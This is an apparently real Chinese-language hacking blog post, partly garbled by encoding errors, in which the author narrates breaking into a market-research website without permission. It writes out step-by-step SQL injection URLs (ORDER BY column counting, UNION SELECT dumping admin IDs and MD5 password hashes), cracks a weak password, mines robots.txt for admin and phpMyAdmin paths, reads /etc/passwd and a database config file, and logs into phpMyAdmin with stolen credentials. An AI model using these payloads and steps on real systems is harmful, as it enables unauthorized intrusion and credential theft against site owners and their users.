最近一直比較關(guān)注PHP注射的東西.學(xué)習(xí)好幾天了.也應(yīng)該實(shí)戰(zhàn)一下了.目標(biāo)http://app.xxxx.com .一個(gè)市場(chǎng)調(diào)查的門(mén)戶(hù).找注射點(diǎn)嘛,還是要用我們可愛(ài)的搜索引擎.為什么可愛(ài)呢?一會(huì)就知道了.Go Go Go !!!!!

在google中搜索php?id= site:xxx.com.意思就是說(shuō)搜索XXX網(wǎng)站中以php?id=的URL.嘿.還真讓我找到一個(gè). http://app.xxx.com/cati/article_literature.php?id=11 .打開(kāi)嚇我一條，它頁(yè)面本身就存在錯(cuò)誤直接出來(lái)了絕對(duì)路徑.



/data01/www/cati/article_literature.php 呵呵,人品爆發(fā)了..通過(guò)路徑可以得知是臺(tái)Linux主機(jī).判斷下是否可以進(jìn)行注射.and 1=1返回正常,and 1=2返回錯(cuò)誤..OK存在注射.然后我們判斷數(shù)據(jù)庫(kù),不出意外應(yīng)該是mysql.傳說(shuō)中的LMAP.環(huán)境(L=Linux M=Mysql A=Apache P=Php)

http://app.xxx.com/cati/article_literature.php?id=11/* 在后面加上/*,返回正常則是Mysql.因?yàn)?*是Mysql的注釋標(biāo)記.



返回正常,確定是Mysql的數(shù)據(jù)庫(kù).現(xiàn)在我們來(lái)檢測(cè)下Mysql的版本.4.0以上支持union聯(lián)合查詢(xún).一般都回是4.0已經(jīng).為什么.因?yàn)镸ysql是開(kāi)源的數(shù)據(jù)庫(kù)不收費(fèi)傻子才不更新呢.呵呵.

http://app.xxx.com/cati/article_literature.php?id=11 and ord(mid(version(),1,1))>51/* 如我所料.果然是4.0以上的.OK.我們來(lái)爆它的字段.

http://app.xxx.com/cati/article_literature.php?id=11 order by 10



返回錯(cuò)誤,說(shuō)明字段小于10
http://app.xxx.com/cati/article_literature.php?id=11 order by 9



返回正常說(shuō)明它有9個(gè)字段.OK.現(xiàn)在我們知道它的字段那我們就來(lái)爆它的管理員吧 呵呵.

http://app.xxx.com/cati/article_literature.php?id=11 and 1=2 union select 1,2,3,4,5,6,7,8,9


出現(xiàn)了一些數(shù)字，一會(huì)那個(gè)地方會(huì)出現(xiàn)我們想要的東西。呵呵,.經(jīng)過(guò)返回的測(cè)試,確定表段為m_admin.

http://app.xxx.com/cati/article_literature.php?id=11 and 1=2 union select 1,2,3,4,5,6,7,8,9 from m_admin



返回正常說(shuō)明存在m_admin標(biāo)段.接下來(lái)我們猜字段.,還記的剛才爆出那個(gè)幾個(gè)數(shù)字吧,對(duì)應(yīng)我們的URL的數(shù)字.我們用字段名去替換掉它.在頁(yè)面里就會(huì)顯示出我們需要的內(nèi)容了.最后只能檢出倆個(gè)字段.一個(gè)為password 一個(gè)為id

http://app.xxx.com/cati/article_literature.php?id=11 and 1=2 union select 1,id,3,4,5,6,7,password,9 from m_admin



2和8的位置出現(xiàn)了我們想要的東西..可惜的沒(méi)有檢測(cè)到用戶(hù)名的字段,不過(guò)沒(méi)關(guān)系，應(yīng)該是admin,或administrator.應(yīng)該問(wèn)題不大?，F(xiàn)在去破解下那個(gè)32位的MD5,看看是不是弱口令
我們?nèi)MD5.com看看…



經(jīng)典123456從先江湖.現(xiàn)在我們找下后臺(tái)吧。拿工具狂掃半天沒(méi)發(fā)現(xiàn)任何可利用的東西。第一次弄PHP的站沒(méi)什么經(jīng)驗(yàn),丟給SpookZanG幫忙,不過(guò)一會(huì)丟給我了管理地址和phpmyadmin的地址.汗~~果然牛..原來(lái)是robots.txt暴露了信息..一著急給忘了還有個(gè)這么個(gè)東西.太粗心了.呵呵.說(shuō)下它是什么東西.搜索引擎會(huì)抓取我們網(wǎng)站的每個(gè)頁(yè)面包括一些敏感的東西.比如MDB.文件,網(wǎng)站后臺(tái),這就是為什么我們可以在google.或百度中搜索到網(wǎng)站后臺(tái)了.比如我們有些東西不想被搜索引擎抓取呢?那怎么辦.在網(wǎng)站目錄下創(chuàng)建robots.txt,里面寫(xiě)不想被搜索引擎抓取的頁(yè)面和目錄,就可以了.但是我們直接訪問(wèn)還是可以給我們暴露一些信息的嘿~..



很明顯/information/admin/為后臺(tái)地址測(cè)試/My_Db_3000/這個(gè)是 phpmyadmin后臺(tái),OK.現(xiàn)在我們進(jìn)后臺(tái)吧.結(jié)果卻…..自動(dòng)跳轉(zhuǎn)到new/admin了.無(wú)法訪問(wèn),限制了IP訪問(wèn)了.郁悶了…一切盡在不言中….



可能大家都知道如果是ROOT的話(huà)我們可以條用load_file.去網(wǎng)站源碼.讀類(lèi)似conn等文件拿到root密碼的話(huà),我們進(jìn)phpmyadmin也是可以備份shell的.嘿..ok.我們來(lái)測(cè)試下.先看看帳戶(hù)是不是roothttp://app.xxx.com/cati/article_literature.php?id=11 and ord(mid(user(),1,1))=114/*結(jié)果不幸如圖,返回錯(cuò)誤帳戶(hù)不是root.



沒(méi)關(guān)系,我們?cè)倏纯串?dāng)前帳戶(hù)有沒(méi)有讀寫(xiě)權(quán)限

http://app.xxx.com/cati/article_literature.php?id=11 and (select count(*) from mysql.user)>0 /*



嘿,有讀寫(xiě)權(quán)限.OK.我們用PHP文件讀取器,來(lái)證實(shí)下吧.軟件默認(rèn)讀/etc/passwd.我們讀下看看.



可以讀/ect/passwd 呵呵.應(yīng)該沒(méi)什么問(wèn)題了.還記的我們剛才爆出來(lái)的路徑吧.我直接讀/data01/www/cati/article_literature.php 文件的頂端會(huì)有數(shù)據(jù)庫(kù)調(diào)用的文件.嘿`.



呵呵.出來(lái)了.然后我們?nèi)プxmysql.php這個(gè)文件.找mysql密碼去.



順利讀出.

OK.我們?nèi)サ顷憄hpmyadmin測(cè)試下吧.哈哈.



OK?，F(xiàn)在可以去做我們想做的事了。